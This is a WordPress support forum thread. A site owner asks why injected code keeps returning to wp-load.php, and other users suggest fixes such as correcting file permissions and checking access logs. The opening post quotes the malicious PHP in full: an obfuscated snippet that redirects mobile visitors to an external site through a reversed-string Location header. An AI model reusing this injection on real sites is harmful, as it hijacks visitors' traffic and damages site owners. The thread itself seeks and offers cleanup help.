wp-load.php injected code keeps coming back

  • Resolved Matt25

    (@matt25)


    6 years, 5 months ago

    Hi,

    I have Wordfence and a couple of my sites keep getting the wp-load.php file changed, it is the same on each site and Wordfence catches it on the scan but it is often too late by the time I get results and manually click repair. Unfortunately this means I keep getting blocked from facebook etc..

    The code that keeps being added to the bottom of the file is:

    if(preg_match('/(mobile|ipod|iphone|up.link|mmp|smartphone|o2|pocket|kindle|treo|nokia|blackberry|pre\/0.1|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{@setcookie('m_', '1', time()+3600, '/'); 
@header(strrev('46z'.'t3'.'a9y'.'/moc'.'.lr'.'uyn'.'it'.'//:pt'.'th :noi'.'tac'.'oL')); 
die();}

    Could you tell me how this keeps happening and where I need to look to get it to stop coming back?

    Thanks in Advance
    Matt

Viewing 3 replies - 1 through 3 (of 3 total)

  • Hi Matt,
    I’ve been dealing with this myself on several sites at once. Each time I would recover from a backup, the hack would happen again. Then I realized that my file permissions had been set to 777 which made it impossible to stop further attacks. After asking my host to fix my file permissions then using Wordfence to remove corrupted files, I haven’t been hacked since. I’m hoping that’s enough but too early to tell. Good luck.

    Hi @matt25!

    Sorry to hear your site was hacked. I think the recommendation from @joshkremer is sensible. You can definitely verify that your file permissions are reasonable.

    There are other reasons this might happen though. To get more clues about how it’s happening you can fetch the raw access logs. Take note of the last modified timestamp on the infected file before you restore it. Then compare that timestamp to the access logs. See if you can find a specific request that happened at the same time as when the file was modified.

    If all else fails you may have to hire an expert to help you clean the site once and for all. Keep in mind that if you have several sites in the same hosting account, they can infect each other so then you’d have to make sure all sites were cleaned at the same time.

    Best of luck for now!

    Hi @matt25,
    Since we haven’t heard from you for a while I’m going to go ahead and resolve this thread for now. If you have any other questions or concerns at any point, feel free to start a new thread. Thank you!

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘wp-load.php injected code keeps coming back’ is closed to new replies.